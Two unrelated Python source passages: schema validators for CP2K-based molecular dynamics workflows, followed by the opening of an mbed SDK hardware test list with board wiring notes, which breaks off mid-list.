    """
    # Shallow merge via unpacking; later keys (d2) win, neither input mutates.
    return {**d1, **d2}
# Validator for the CP2K settings shared by every workflow.
schema_cp2k_general_settings = Schema({
    # Basis set to carry out the quantum chemistry simulation
    "basis": str,
    # Pseudo-potential to carry out the quantum chemistry simulation
    "potential": str,
    # Charge of the system
    Optional("charge", default=0): int,
    # Multiplicity
    Optional("multiplicity", default=1): int,
    # Specify the Cartesian components for the cell vector:
    # a single scalar, a 3-vector, or a full 3x3 matrix
    "cell_parameters": Or(
        Real,
        lambda xs: len(xs) == 3 and isinstance(xs, list),
        lambda xs: len(xs) == 3 and all(len(r) == 3 for r in xs)),
    # Type of periodicity.
    # Fix: the tuple previously listed "xy" twice and omitted "xz",
    # so the valid CP2K direction pair "xz" was rejected.
    "periodic": And(
        str, Use(str.lower), lambda s: s in (
            "none", "x", "y", "z", "xy", "xz", "yz", "xyz")),
    # Specify the angles between the vectors defining the unit cell
    Optional("cell_angles"): list,
    # Path to the folder containing the basis set specifications
    Optional("path_basis", default=pkg.resource_filename("nac", "basis")): os.path.isdir,
    # Settings describing the input of the quantum package
    "cp2k_settings_main": object,
    # Settings describing the input of the quantum package
    # used to compute the guess wavefunction
    "cp2k_settings_guess": object,
    # Restart file name
    Optional("wfn_restart_file_name", default=None): Or(str, None),
    # File containing the parameters of the cell if those
    # parameters change during the MD simulation
    Optional("file_cell_parameters", default=None): Or(str, None),
    # Quality of the auxiliary basis cFIT
    Optional("aux_fit", default="verygood"): And(
        str, Use(str.lower), lambda s: s in
        ("low", "medium", "good", "verygood", "excellent"))
})
# Options common to every workflow; merged with the workflow-specific
# dictionaries below before being wrapped in a Schema.
dict_general_options = {
    # Number of occupied/virtual orbitals to use
    'active_space': And(list, lambda xs: len(xs) == 2),
    # Index of the HOMO
    Optional("nHOMO"): int,
    # Index range of the orbitals used to compute the couplings
    Optional("mo_index_range"): tuple,
    # Default quantum chemistry package used
    Optional("package_name", default="cp2k"): str,
    # Project name
    Optional("project_name", default="namd"): str,
    # Working directory
    Optional("scratch_path", default=None): str,
    # Path to the HDF5 file where the results are stored
    Optional("path_hdf5", default="quantum.hdf5"): str,
    # Path to the xyz trajectory of the molecular dynamics
    "path_traj_xyz": os.path.exists,
    # Index from which to start enumerating the folders created for each point in the MD
    Optional("enumerate_from", default=0): int,
    # Ignore the warnings issued by the quantum package and keep computing
    Optional("ignore_warnings", default=False): bool,
    # Calculate the guess wave function in either the first point of the trajectory or in all
    Optional("calculate_guesses", default="first"):
    And(str, Use(str.lower), lambda s: s in ("first", "all")),
    # Units of the molecular geometry on the MD file
    Optional("geometry_units", default="angstrom"):
    And(str, Use(str.lower), lambda s: s in (
        "angstrom", "au")),
    # Integration time step used for the MD (femtoseconds)
    Optional("dt", default=1): Real,
    # General settings
    "cp2k_general_settings": schema_cp2k_general_settings
}
# Options specific to the derivative-couplings workflow.
dict_derivative_couplings = {
    # Name of the workflow to run
    "workflow": And(
        str, Use(str.lower), lambda s: s == "derivative_couplings"),
    # Algorithm used to compute the derivative couplings.
    # Fix: the predicate previously returned the tuple ("levine", "3points")
    # itself — always truthy — so ANY string passed validation; it must test
    # membership instead.
    Optional("algorithm", default="levine"):
        And(str, Use(str.lower), lambda s: s in ("levine", "3points")),
    # Use MPI to compute the couplings
    Optional("mpi", default=False): bool,
    # Track the crossing between states
    Optional("tracking", default=True): bool,
    # Write the overlaps in ascii
    Optional("write_overlaps", default=False): bool,
    # Compute the overlap between molecular geometries using a dephase
    Optional("overlaps_deph", default=False): bool
}
# Full option set for the derivative-couplings workflow: the general
# options extended/overridden by the workflow-specific entries.
dict_merged_derivative_couplings = merge(
    dict_general_options, dict_derivative_couplings)
# Validator for a derivative-couplings input file.
schema_derivative_couplings = Schema(
    dict_merged_derivative_couplings)
# Validator for the job-scheduler section used by the distributed workflows.
schema_job_scheduler = Schema({
    # Resource manager to submit the chunks with.
    # Fix: the predicate previously returned the tuple ("SLURM", "PBS")
    # itself — always truthy — so any string passed; test membership instead.
    Optional("scheduler", default="SLURM"):
        And(str, Use(str.upper), lambda s: s in ("SLURM", "PBS")),
    Optional("nodes", default=1): int,
    Optional("tasks", default=1): int,
    Optional("wall_time", default="01:00:00"): str,
    Optional("job_name", default="namd"): str,
    Optional("queue_name", default="short"): str,
    Optional("load_modules", default=""): str
})
# Options common to every "distribute_*" workflow (trajectory chunking
# and job submission).
dict_distribute = {
    # Folder where the chunks are generated.  NOTE: os.getcwd() is evaluated
    # once at import time, not when the schema is validated.
    Optional("workdir", default=os.getcwd()): str,
    # Number of chunks to split the trajectory
    "blocks": int,
    # Resource manager configuration
    "job_scheduler": schema_job_scheduler,
    # General settings
    "cp2k_general_settings": schema_cp2k_general_settings,
}
# Marker entry identifying the distributed derivative-couplings workflow.
dict_distribute_derivative_couplings = {
    # Name of the workflow to run
    "workflow": And(
        str, Use(str.lower), lambda s: s == "distribute_derivative_couplings")
}
# Validator: distribution options + merged couplings options + marker
# (later dictionaries win on key clashes, so "workflow" is overridden).
schema_distribute_derivative_couplings = Schema(
    merge(dict_distribute, merge(
        dict_merged_derivative_couplings, dict_distribute_derivative_couplings)))
# Options specific to the absorption-spectrum workflow.
dict_absorption_spectrum = {
    # Name of the workflow to run
    "workflow": And(
        str, Use(str.lower), lambda s: s == "absorption_spectrum"),
    # Type of TDDFT calculation. Available: sing_orb, stda, stddft.
    # Fix: the allowed set contained the typo "stdft", so the documented
    # value "stddft" failed validation.
    Optional("tddft", default="stda"): And(
        str, Use(str.lower), lambda s: s in ("sing_orb", "stda", "stddft")),
    # Interval between MD points where the oscillators are computed
    Optional("stride", default=1): int,
    # Exchange-correlation functional used in the DFT calculations
    Optional("xc_dft", default="pbe"): str
}
# Full option set and validator for the absorption-spectrum workflow.
dict_merged_absorption_spectrum = merge(
    dict_general_options, dict_absorption_spectrum)
schema_absorption_spectrum = Schema(dict_merged_absorption_spectrum)
# Marker entry identifying the distributed absorption-spectrum workflow.
dict_distribute_absorption_spectrum = {
    # Name of the workflow to run
    "workflow": And(
        str, Use(str.lower), lambda s: s == "distribute_absorption_spectrum")
}
# Validator: distribution options + merged spectrum options + marker.
schema_distribute_absorption_spectrum = Schema(
    merge(dict_distribute, merge(
        dict_merged_absorption_spectrum, dict_distribute_absorption_spectrum)))
# Options specific to the single-points workflow.
dict_single_points = {
    # Name of the workflow to run
    "workflow": And(
        str, Use(str.lower), lambda s: s == "single_points"),
    # General settings
    "cp2k_general_settings": schema_cp2k_general_settings
}
# Marker entry identifying the distributed single-points workflow.
dict_distribute_single_points = {
    # Name of the workflow to run
    "workflow": And(
        str, Use(str.lower), lambda s: s == "distribute_single_points")
}
# Validators: plain single points, and single points split into chunks.
dict_merged_single_points = merge(dict_general_options, dict_single_points)
schema_single_points = Schema(dict_merged_single_points)
schema_distribute_single_points = Schema(
    merge(dict_distribute, merge(
        dict_merged_single_points, dict_distribute_single_points)))
| |
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from tools.paths import *
from tools.data.support import *
# Locations of the shared test-support libraries.
TEST_CMSIS_LIB = join(TEST_DIR, "cmsis", "lib")
TEST_MBED_LIB = join(TEST_DIR, "mbed", "env")
# Directories with peripheral drivers, size benchmarks and SD-card tests.
PERIPHERALS = join(TEST_DIR, "peripherals")
BENCHMARKS_DIR = join(TEST_DIR, "benchmarks")
SD = join(TEST_DIR, "sd")
# Peripheral driver libraries pulled in by individual test cases.
TMP102 = join(PERIPHERALS, 'TMP102')
AT30TSE75X = join(PERIPHERALS, 'AT30TSE75X')
"""
Wiring:
* Ground:
* LPC1*: p1
* KL25Z: GND
* Vout
* LPC1*: p40
* KL25Z: P3V3
* TMP102 (I2C):
* LPC1*: (SDA=p28 , SCL=p27)
* KL25Z: (SDA=PTC9, SCL=PTC8)
* MAXWSNENV: (SDA=TP6, SCL=TP5)
* digital_loop (Digital(In|Out|InOut), InterruptIn):
* Arduino headers: (D0 <-> D7)
* LPC1549: (D2 <-> D7)
* LPC1*: (p5 <-> p25 )
* KL25Z: (PTA5<-> PTC6)
* NUCLEO_F103RB: (PC_6 <-> PB_8)
* MAXWSNENV: (TP3 <-> TP4)
* MAX32600MBED: (P1_0 <-> P4_7)
* VK_RZ_A1H: (P3_2 <-> P5_6)
* port_loop (Port(In|Out|InOut)):
* Arduino headers: (D0 <-> D7), (D1 <-> D6)
* LPC1*: (p5 <-> p25), (p6 <-> p26)
* KL25Z: (PTA5 <-> PTC6), (PTA4 <-> PTC5)
* NUCLEO_F103RB: (PC_6 <-> PB_8), (PC_5 <-> PB_9)
* MAXWSNENV: (TP1 <-> TP3), (TP2 <-> TP4)
* MAX32600MBED: (P1_0 <-> P4_7), (P1_1 <-> P4_6)
* VK_RZ_A1H: (P3_2 <-> P5_6), (P3_7 <-> P5_1)
* analog_loop (AnalogIn, AnalogOut):
* Arduino headers: (A0 <-> A5)
* LPC1549: (A0 <-> D12)
* LPC1*: (p17 <-> p18 )
* KL25Z: (PTE30 <-> PTC2)
* analog_pot (AnalogIn):
* Arduino headers: (A0, A1)
* VK_RZ_A1H: (AN0, AN1)
* SD (SPI):
* LPC1*: (mosi=p11 , miso=p12 , sclk=p13 , cs=p14 )
* KL25Z: (mosi=PTD2, miso=PTD3, sclk=PTD1, cs=PTD0)
* MMA7660 (I2C):
* LPC1*: (SDA=p28 , SCL=p27)
* i2c_loop:
* LPC1768: (p28 <-> p9), (p27 <-> p10)
* i2c_eeprom:
* LPC1*: (SDA=p28 , SCL=p27)
* KL25Z: (SDA=PTE0, SCL=PTE1)
* VK_RZ_A1H:(SDA=P1_1, SCL=P1_0)
* can_transceiver:
* LPC1768: (RX=p9, TX=p10)
* LPC1549: (RX=D9, TX=D8)
* LPC4088: (RX=p9, TX=p10)
* VK_RZ_A1H:(RX=P5_9, TX=P5_10)
* NUCLEO_F091RC: (RX=PA_11, TX=PA_12)
* NUCLEO_F072RB: (RX=PA_11, TX=PA_12)
* NUCLEO_F042K6: (RX=PA_11, TX=PA_12)
* NUCLEO_F334R8: (RX=PA_11, TX=PA_12)
* NUCLEO_F303RE: (RX=PA_11, TX=PA_12)
* NUCLEO_F303K8: (RX=PA_11, TX=PA_12)
* NUCLEO_F302R8: (RX=PA_11, TX=PA_12)
* NUCLEO_F446RE: (RX=PA_11, TX=PA_12)
* DISCO_F469NI: (RX=PB_8, TX=PB_9)
* DISCO_F429ZI: (RX=PA_11, TX=PA_12)
* NUCLEO_F103RB: (RX=PA_11, TX=PA_12)
* NUCLEO_F746ZG: (RX=PA_11, TX=PA_12)
* DISCO_F746NG: (RX=PB_8, TX=PB_9)
* DISCO_L476VG: (RX=PA_11, TX=PA_12)
* NUCLEO_L476RG: (RX=PA_11, TX=PA_12)
"""
TESTS = [
# Automated MBED tests
{
"id": "MBED_A1", "description": "Basic",
"source_dir": join(TEST_DIR, "mbed", "basic"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
},
{
"id": "MBED_A2", "description": "Semihost file system",
"source_dir": join(TEST_DIR, "mbed", "file"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC2368", "LPC11U24"]
},
{
"id": "MBED_A3", "description": "C++ STL",
"source_dir": join(TEST_DIR, "mbed", "stl"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False,
},
{
"id": "MBED_A4", "description": "I2C TMP102",
"source_dir": join(TEST_DIR, "mbed", "i2c_TMP102"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, TMP102],
"automated": True,
"peripherals": ["TMP102"]
},
{
"id": "MBED_AT30TSE75X", "description": "I2C Temperature Sensor / EEPROM",
"source_dir": join(TEST_DIR, "mbed", "i2c_at30tse75x"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, AT30TSE75X],
"automated": False,
"peripherals": ["AT30TSE75X"]
},
{
"id": "MBED_A5", "description": "DigitalIn DigitalOut",
"source_dir": join(TEST_DIR, "mbed", "digitalin_digitalout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"peripherals": ["digital_loop"]
},
{
"id": "MBED_A6", "description": "DigitalInOut",
"source_dir": join(TEST_DIR, "mbed", "digitalinout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"peripherals": ["digital_loop"]
},
{
"id": "MBED_A7", "description": "InterruptIn",
"source_dir": join(TEST_DIR, "mbed", "interruptin"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
"peripherals": ["digital_loop"]
},
{
"id": "MBED_A8", "description": "Analog",
"source_dir": join(TEST_DIR, "mbed", "analog"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"peripherals": ["analog_loop"],
"mcu": ["LPC1768", "LPC2368", "LPC2460", "KL25Z", "K64F", "K22F", "LPC4088", "LPC1549",
"NUCLEO_F072RB", "NUCLEO_F091RC", "NUCLEO_F302R8", "NUCLEO_F303K8", "NUCLEO_F303RE",
"NUCLEO_F334R8", "NUCLEO_L053R8", "NUCLEO_L073RZ", "NUCLEO_L152RE",
"NUCLEO_F410RB", "NUCLEO_F411RE", "NUCLEO_F446RE", "DISCO_F407VG", "DISCO_F746NG", "NUCLEO_F746ZG",
"ARCH_MAX", "MAX32600MBED", "MOTE_L152RC", "B96B_F446VE"]
},
{
"id": "MBED_A9", "description": "Serial Echo at 115200",
"source_dir": join(TEST_DIR, "mbed", "echo"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test": "echo"
},
{
"id": "MBED_A10", "description": "PortOut PortIn",
"source_dir": join(TEST_DIR, "mbed", "portout_portin"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["port_loop"],
"supported": DEFAULT_SUPPORT,
"automated": True,
},
{
"id": "MBED_A11", "description": "PortInOut",
"source_dir": join(TEST_DIR, "mbed", "portinout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["port_loop"],
"supported": DEFAULT_SUPPORT,
"automated": True,
},
{
"id": "MBED_A12", "description": "SD File System",
"source_dir": join(TEST_DIR, "mbed", "sd"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
{
"id": "MBED_A13", "description": "I2C MMA7660 accelerometer",
"source_dir": join(TEST_DIR, "mbed", "i2c_MMA7660"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'MMA7660')],
"automated": True,
"peripherals": ["MMA7660"]
},
{
"id": "MBED_A14", "description": "I2C Master",
"source_dir": join(TEST_DIR, "mbed", "i2c_master"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A15", "description": "I2C Slave",
"source_dir": join(TEST_DIR, "mbed", "i2c_slave"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A16", "description": "SPI Master",
"source_dir": join(TEST_DIR, "mbed", "spi_master"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A17", "description": "SPI Slave",
"source_dir": join(TEST_DIR, "mbed", "spi_slave"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
},
{
"id": "MBED_A18", "description": "Interrupt vector relocation",
"source_dir": join(TEST_DIR, "mbed", "vtor_reloc"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
"mcu": ["LPC1768"],
"automated": True,
},
{
"id": "MBED_A19", "description": "I2C EEPROM read/write test",
"source_dir": join(TEST_DIR, "mbed", "i2c_eeprom"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["24LC256"],
"automated": True,
"duration": 15,
},
{
"id": "MBED_A20", "description": "I2C master/slave test",
"source_dir": join(TEST_DIR, "mbed", "i2c_master_slave"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB,],
"mcu": ["LPC1768", "RZ_A1H"],
"peripherals": ["i2c_loop"]
},
{
"id": "MBED_A21", "description": "Call function before main (mbed_main)",
"source_dir": join(TEST_DIR, "mbed", "call_before_main"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
},
{
"id": "MBED_A22", "description": "SPIFI for LPC4088 (test 1)",
"source_dir": join(TEST_DIR, "mbed", "spifi1"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 30,
"mcu": ["LPC4088","LPC4088_DM"]
},
{
"id": "MBED_A23", "description": "SPIFI for LPC4088 (test 2)",
"source_dir": join(TEST_DIR, "mbed", "spifi2"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 30,
"mcu": ["LPC4088","LPC4088_DM"]
},
{
"id": "MBED_A24", "description": "Serial echo with RTS/CTS flow control",
"source_dir": join(TEST_DIR, "mbed", "echo_flow_control"),
"dependencies": [MBED_LIBRARIES],
"automated": "True",
"host_test": "echo_flow_control",
"mcu": ["LPC1768"],
"peripherals": ["extra_serial"]
},
{
"id": "MBED_A25", "description": "I2C EEPROM line read/write test",
"source_dir": join(TEST_DIR, "mbed", "i2c_eeprom_line"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["24LC256"],
"automated": True,
"duration": 10,
},
{
"id": "MBED_A26", "description": "AnalogIn potentiometer test",
"source_dir": join(TEST_DIR, "mbed", "analog_pot"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"peripherals": ["analog_pot"],
"automated": True,
"duration": 10,
},
{
"id": "MBED_A27", "description": "CAN loopback test",
"source_dir": join(TEST_DIR, "mbed", "can_loopback"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 20,
"peripherals": ["can_transceiver"],
"mcu": ["LPC1549", "LPC1768","B96B_F446VE", "VK_RZ_A1H",
"NUCLEO_F091RC", "NUCLEO_F072RB", "NUCLEO_F042K6", "NUCLEO_F334R8",
"NUCLEO_F303RE", "NUCLEO_F303K8", "NUCLEO_F302R8", "NUCLEO_F446RE",
"DISCO_F469NI", "DISCO_F429ZI", "NUCLEO_F103RB", "NUCLEO_F746ZG",
"DISCO_F746NG", "DISCO_L476VG", "NUCLEO_L476RG"]
},
{
"id": "MBED_BLINKY", "description": "Blinky",
"source_dir": join(TEST_DIR, "mbed", "blinky"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False,
},
{
"id": "MBED_BUS", "description": "Blinky BUS",
"source_dir": join(TEST_DIR, "mbed", "bus"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": False,
"duration": 15,
},
{
"id": "MBED_BUSOUT", "description": "BusOut",
"source_dir": join(TEST_DIR, "mbed", "bus_out"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"duration": 15,
},
# Size benchmarks
{
"id": "BENCHMARK_1", "description": "Size (c environment)",
"source_dir": join(BENCHMARKS_DIR, "cenv"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_2", "description": "Size (float math)",
"source_dir": join(BENCHMARKS_DIR, "float_math"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_3", "description": "Size (printf)",
"source_dir": join(BENCHMARKS_DIR, "printf"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_4", "description": "Size (mbed libs)",
"source_dir": join(BENCHMARKS_DIR, "mbed"),
"dependencies": [MBED_LIBRARIES]
},
{
"id": "BENCHMARK_5", "description": "Size (all)",
"source_dir": join(BENCHMARKS_DIR, "all"),
"dependencies": [MBED_LIBRARIES]
},
# performance related tests
{
"id": "PERF_1", "description": "SD Stdio R/W Speed",
"source_dir": join(TEST_DIR, "mbed", "sd_perf_stdio"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
{
"id": "PERF_2", "description": "SD FileHandle R/W Speed",
"source_dir": join(TEST_DIR, "mbed", "sd_perf_fhandle"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
{
"id": "PERF_3", "description": "SD FatFS R/W Speed",
"source_dir": join(TEST_DIR, "mbed", "sd_perf_fatfs"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"duration": 15,
"peripherals": ["SD"]
},
# Not automated MBED tests
{
"id": "MBED_1", "description": "I2C SRF08",
"source_dir": join(TEST_DIR, "mbed", "i2c_SRF08"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'SRF08')],
"peripherals": ["SRF08"]
},
{
"id": "MBED_2", "description": "stdio",
"source_dir": join(TEST_DIR, "mbed", "stdio"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 20,
"automated": True,
#"host_test": "stdio_auto"
},
{
"id": "MBED_3", "description": "PortOut",
"source_dir": join(TEST_DIR, "mbed", "portout"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_4", "description": "Sleep",
"source_dir": join(TEST_DIR, "mbed", "sleep"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 30,
"mcu": ["LPC1768", "LPC11U24", "LPC4088","LPC4088_DM","NRF51822", "LPC11U68"]
},
{
"id": "MBED_5", "description": "PWM",
"source_dir": join(TEST_DIR, "mbed", "pwm"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB]
},
{
"id": "MBED_6", "description": "SW Reset",
"source_dir": join(TEST_DIR, "mbed", "reset"),
"dependencies": [MBED_LIBRARIES],
"duration": 15
},
{
"id": "MBED_7", "description": "stdio benchmark",
"source_dir": join(TEST_DIR, "mbed", "stdio_benchmark"),
"dependencies": [MBED_LIBRARIES],
"duration": 40
},
{
"id": "MBED_8", "description": "SPI",
"source_dir": join(TEST_DIR, "mbed", "spi"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_9", "description": "Sleep Timeout",
"source_dir": join(TEST_DIR, "mbed", "sleep_timeout"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_10", "description": "Hello World",
"source_dir": join(TEST_DIR, "mbed", "hello"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test": "hello_auto",
},
{
"id": "MBED_11", "description": "Ticker Int",
"source_dir": join(TEST_DIR, "mbed", "ticker"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test": "wait_us_auto",
"duration": 20,
},
{
"id": "MBED_12", "description": "C++",
"source_dir": join(TEST_DIR, "mbed", "cpp"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True
},
{
"id": "MBED_13", "description": "Heap & Stack",
"source_dir": join(TEST_DIR, "mbed", "heap_and_stack"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
},
{
"id": "MBED_14", "description": "Serial Interrupt",
"source_dir": join(TEST_DIR, "mbed", "serial_interrupt"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
},
{
"id": "MBED_15", "description": "RPC",
"source_dir": join(TEST_DIR, "mbed", "rpc"),
"dependencies": [MBED_LIBRARIES, join(LIB_DIR, "rpc"), TEST_MBED_LIB],
"automated": False,
"mcu": ["LPC1768"]
},
{
"id": "MBED_16", "description": "RTC",
"source_dir": join(TEST_DIR, "mbed", "rtc"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"exclude_mcu": ["NRF51822", "NRF51822_BOOT", "NRF51822_OTA", "NRF51822_Y5_MBUG",
"NRF51_DK", "NRF51_DK_BOOT", "NRF51_DK_OTA",
"NRF51_MICROBIT", "NRF51_MICROBIT_B", "NRF51_MICROBIT_BOOT",
"NRF51_MICROBIT_B_BOOT", "NRF51_MICROBIT_B_OTA", "NRF51_MICROBIT_OTA",
"HRM1017", "HRM1017_BOOT", "HRM1701_OTA",
"TY51822R3", "TY51822R3_BOOT", "TY51822R3_OTA",
"NRF15_DONGLE", "NRF15_DONGLE_BOOT", "NRF15_DONGLE_OTA",
"ARCH_BLE", "ARCH_BLE_BOOT", "ARCH_BLE_OTA",
"ARCH_LINK", "ARCH_LINK_BOOT", "ARCH_LINK_OTA",
"RBLAB_BLENANO", "RBLAB_BLENANO_BOOT", "RBLAB_BLENANO_OTA",
"RBLAB_NRF51822", "RBLAB_NRF51822_BOOT", "RBLAB_NRF51822_OTA",
"SEEED_TINY_BLE", "SEEED_TINY_BLE_BOOT", "SEEED_TINY_BLE_OTA",
"WALLBOT_BLE", "WALLBOT_BLE_BOOT", "WALLBOT_BLE_OTA",
"DELTA_DFCM_NNN40", "DELTA_DFCM_NNN40_BOOT", "DELTA_DFCM_NNN40_OTA",
"LPC1114"],
#"host_test": "rtc_auto",
"duration": 15
},
{
"id": "MBED_17", "description": "Serial Interrupt 2",
"source_dir": join(TEST_DIR, "mbed", "serial_interrupt_2"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_18", "description": "Local FS Directory",
"source_dir": join(TEST_DIR, "mbed", "dir"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_19", "description": "SD FS Directory",
"source_dir": join(TEST_DIR, "mbed", "dir_sd"),
"dependencies": [MBED_LIBRARIES, FS_LIBRARY],
"peripherals": ["SD"]
},
{
"id": "MBED_20", "description": "InterruptIn 2",
"source_dir": join(TEST_DIR, "mbed", "interruptin_2"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_21", "description": "freopen Stream",
"source_dir": join(TEST_DIR, "mbed", "freopen"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_22", "description": "Semihost",
"source_dir": join(TEST_DIR, "mbed", "semihost"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC2368", "LPC11U24"]
},
{
"id": "MBED_23", "description": "Ticker Int us",
"source_dir": join(TEST_DIR, "mbed", "ticker_2"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_24", "description": "Timeout Int us",
"source_dir": join(TEST_DIR, "mbed", "timeout"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_25", "description": "Time us",
"source_dir": join(TEST_DIR, "mbed", "time_us"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto"
},
{
"id": "MBED_26", "description": "Integer constant division",
"source_dir": join(TEST_DIR, "mbed", "div"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
},
{
"id": "MBED_27", "description": "SPI ADXL345",
"source_dir": join(TEST_DIR, "mbed", "spi_ADXL345"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'ADXL345')],
"peripherals": ["ADXL345"]
},
{
"id": "MBED_28", "description": "Interrupt chaining (InterruptManager)",
"source_dir": join(TEST_DIR, "mbed", "interrupt_chaining"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
},
{
"id": "MBED_29", "description": "CAN network test",
"source_dir": join(TEST_DIR, "mbed", "can"),
"dependencies": [MBED_LIBRARIES],
"mcu": ["LPC1768", "LPC4088", "LPC1549", "RZ_A1H", "B96B_F446VE", "NUCLEO_F091RC",
"NUCLEO_F072RB", "NUCLEO_F042K6", "NUCLEO_F334R8", "NUCLEO_F303RE",
"NUCLEO_F303K8", "NUCLEO_F302R8", "NUCLEO_F446RE", "DISCO_F469NI",
"DISCO_F429ZI", "NUCLEO_F103RB", "NUCLEO_F746ZG", "DISCO_F746NG",
"NUCLEO_L476RG"]
},
{
"id": "MBED_30", "description": "CAN network test using interrupts",
"source_dir": join(TEST_DIR, "mbed", "can_interrupt"),
"dependencies": [MBED_LIBRARIES],
"mcu": ["LPC1768", "LPC4088", "LPC1549", "RZ_A1H", "B96B_F446VE", "NUCLEO_F091RC",
"NUCLEO_F072RB", "NUCLEO_F042K6", "NUCLEO_F334R8", "NUCLEO_F303RE",
"NUCLEO_F303K8", "NUCLEO_F302R8", "NUCLEO_F446RE", "DISCO_F469NI",
"DISCO_F429ZI", "NUCLEO_F103RB", "NUCLEO_F746ZG", "DISCO_F746NG",
"NUCLEO_L476RG"]
},
{
"id": "MBED_31", "description": "PWM LED test",
"source_dir": join(TEST_DIR, "mbed", "pwm_led"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_32", "description": "Pin toggling",
"source_dir": join(TEST_DIR, "mbed", "pin_toggling"),
"dependencies": [MBED_LIBRARIES],
},
{
"id": "MBED_33", "description": "C string operations",
"source_dir": join(TEST_DIR, "mbed", "cstring"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 10,
"automated": False,
},
{
"id": "MBED_34", "description": "Ticker Two callbacks",
"source_dir": join(TEST_DIR, "mbed", "ticker_3"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
